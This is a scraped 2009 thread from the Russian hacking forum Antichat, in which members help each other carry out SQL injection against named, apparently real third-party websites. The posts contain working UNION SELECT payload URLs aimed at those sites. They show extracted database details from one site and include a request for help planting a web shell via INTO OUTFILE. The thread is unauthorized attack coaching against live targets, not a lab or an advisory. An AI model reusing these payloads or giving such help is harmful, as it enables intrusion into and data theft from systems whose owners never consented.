Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.06.2009, 10:39
|
|
Новичок
Регистрация: 11.06.2008
Сообщений: 29
Провел на форуме:
340480
Репутация:
11
|
|
Здравствуйте, есть сайт с Injection в POST запросе.
При value="1' " выдает
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by `name`' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in shop.php on line 456
видимо кавычки экранируются.
При запросе value="1+1" выдает страницу как при value="2".
Возможно ли расскрутить эту иньекцию в что либо стоящие?
Последний раз редактировалось SeTM; 02.07.2009 в 09:03..
|
|
|
01.07.2009, 10:49
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
SeTM, почему нет?
пробуй дальше, всё так же как и при GET, только с POST Запросами...
|
|
|
|
09.10.2009, 21:37
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901
Репутация:
0
|
|
Хай алл. Кароче фак суперский, но есть пара дополнений например, место того чтобы до куя раз писать limit+1,1 limit+2,1 не легче ли просто написать limit+1,200 и все таблицы выдут пробывал =). Ещё такой вопрос я нашёл дрявый сайт http://www.feldgrau.com/articles.php?ID=73+union+select+1,2,3,4,5,6,@@base dir,8/* ну раскрутил до нельзя, но не могу загнать шелл потому что там нет админки и через Into outfile тоже не получается кто знает помогите до конца освоить =)
|
|
|
|
18.10.2009, 16:58
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
тривиальный пример:
Код:
mysql_query('select * from `news` where id =$_GET['id']')
|
|
|
|
25.10.2009, 19:35
|
|
Новичок
Регистрация: 30.09.2009
Сообщений: 2
Провел на форуме:
55307
Репутация:
0
|
|
Ну к примеру сайт http://www.mibf.ru.Захожу в любую новость
http://www.mibf.ru/?id=52&news_id=417
Вместо 417 вставляю 1'
Выходят ошибки SQL(как я понял)
Теперь не пойму...можно ли использовать SQL Injection тут,и что мне дальше делать с этим?
П.С заметил когда в ссылке http://www.mibf.ru/?id=52&news_id=417 вместо ?id=52 вставляю 1' вылезает белое окно с ошибкой,А если на место 417 вставить...будет другой результят.С чем это может быть связанно?
Заранее благодарю
|
|
|
|
25.10.2009, 20:40
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от GR00nDeL
Ну мне поможет кто нибудь с моим вопросом?(
eval()'d code
Это не SQL ошибка, а вообще мне кажется он исполняет точто приходит из бд.
Сейчас покавыряюсь скажу.
http://www.mibf.ru/?id=-52+union+select+1,2,3,4,5,6,7,8,9,10+--+
>>
http://www.mibf.ru/?id=-52+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),database(),version()),concat_ws(0x3a,user(),data base(),version()),10+--+
>>>
User: mibf@localhost
Database: mibficom
Version: 5.0.45
Последний раз редактировалось Ctacok; 25.10.2009 в 20:46..
|
|
|
|
03.11.2009, 02:16
|
|
Участник форума
Регистрация: 25.10.2007
Сообщений: 177
Провел на форуме:
551782
Репутация:
58
|
|
Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):
http://www.s##par##k-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+1,2--
Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так? |
|
|
|
03.11.2009, 11:58
|
|
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942
Репутация:
350
|
|
хм... скорее всего нет полей на вывод
|
|
|
|
03.11.2009, 18:35
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Сообщение от freelsd
Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):
Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так?
_http://www.spark-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),null--
Последний раз редактировалось .:[melkiy]:.; 03.11.2009 в 18:45..
|
|
|
|
23.11.2009, 12:17
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020
Репутация:
18
|
|
подскажите пожалуйста, что делать, если на запрос
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='author'+LIMIT+1,1+--
выводится mysql_fetch_array(): supplied argument is not a valid MySQL result resource...
похоже, что фильтруется кавычка, но
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME=char(27)+author+char(27) +LIMIT+1,1+--
выводит ту же ошибку
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.gif){kind=avatar}
Похожие темы
Линейный вид
